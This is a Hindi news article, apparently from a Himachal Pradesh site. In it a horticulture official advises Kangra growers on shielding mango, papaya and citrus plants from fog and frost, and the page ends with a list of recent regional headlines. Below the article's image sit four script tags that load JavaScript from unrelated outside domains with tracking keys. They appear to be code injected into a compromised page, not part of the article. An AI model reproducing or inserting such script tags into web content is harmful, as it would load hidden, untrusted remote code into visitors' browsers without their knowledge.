Categories: हिमाचल

बागवानी उप निदेशक ने दी कोहरे से बचाव के लिए पौधों पर पानी का छिड़काव करने की जानकारी

<p>धर्मशाला में उप निदेशक, बागवानी आर.एस.नेगी ने ज़िला के बागवानों को जानकारी प्रदान करते हुए कहा कि कोहरे के कारण होने वाले नुक्सान से बचने के लिए पौधों पर पानी का छिड़काव किया जाए। उन्होंने बताया कि सर्दी के मौसम में मैदानी क्षेत्रों में कोहरा पड़ना आम बात है लेकिन कोहरे की बजह से पौधों पर पड़ने वाले प्रभाव को रोकना आवश्यक होता है। कोहरे का प्रभाव बेहतर प्रबन्धन से कम किया जा सकता है जिसमें पौधों को पहुंचने वाले नुक्सान को कम किया जा सके। ज़िला कांगड़ा में आम, पपीता, नीम्बू प्रजाति के फलों इत्यादि पर कोहरे के कारण प्रतिकूल प्रभाव पड़ता है। सर्दी के मौसम में कोहरे के चलते हवा में विद्यमान नमी बर्फ के कण बन जाते हैं और कम तापमान की बजह से पौधों की कोशिकाएं फट जाती हैं।</p>

<p>कोहरे के प्रभाव से फल खराब हो जाता है व फूल झड़ने लगते हैं। कई बार आने वाले वर्षों में भी फलदार पौधे कम पैदावार देते हैं। पपीता, आम आदि में पौधों पर कोहरे का प्रभाव अधिक पाया जाता है। सब्जियों पर भी इसका असर पड़ता है, जिससे कभी-कभी शत-प्रतिशत सब्जी की फसल नष्ट हो जाती है। उन्होंने बताया कि पहाड़ी क्षेत्रों में जैसे-जैसे रात के समय भूमि की सतह ठण्डी होती जाती है, वैसे-वैसे ठण्डी हवा निम्न क्षेत्र या घाटी की तरफ चलती जाती है और गर्म हवा ऊपर उठती जाती है। इस प्रकार के कोहरे से मैदानी क्षेत्र ठण्डे कोहरे की चादर से ढक जाते हैं।</p>

<p>उन्होंने बताया कि फल पौधों मुख्यतः आम, पपीता और नीम्बू कोहरे से ज्यादा प्रभावित क्षेत्रों में न लगाएं। कोहरे वाले क्षेत्रों में अनार, अमरूद, पीकान इत्यादि के पौधे लगाने चाहिएं। छोटे पौधों को घास या सरकण्डें से ढक देना चाहिए और दक्षिण-पश्चिम दिशा में धूप के लिए खुला रखना चाहिए। पौधों में पोटाश खाद देने से उसकी कोहरा सहने की क्षमता बढ़ती है और सर्दियों से पहले या सर्दियों के दिनों में पौधों में नाइट्रोजन खाद न डालें तथा फल पौधों की नर्सरियों को कोहरे से बचाने के लिए घास या छायादार जाली से ढक देना चाहिए। नए बागीचों की स्थापना के लिए अपने नजदीकी विषय विवाद विशेषज्ञ, उद्यान विकास अधिकारी या उद्यान विस्तार अधिकारी से सलाह लें। इसके साथ ही सरकार द्वारा चलाई जा रही पुनः गठित मौसम आधारित फसल बीमा योजना के अन्तर्गत अपने फल-पौधों का बीमा करवाएं ताकि बागवानों का उपज में होने वाली सम्भावित क्षति से होने वाले आर्थिक नुक्सान की भरपाई की जा सके।</p>

<p><img src=”/media/gallery/images/image(1939).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1609844483137″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

3 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

3 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

4 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

5 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

5 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

6 hours ago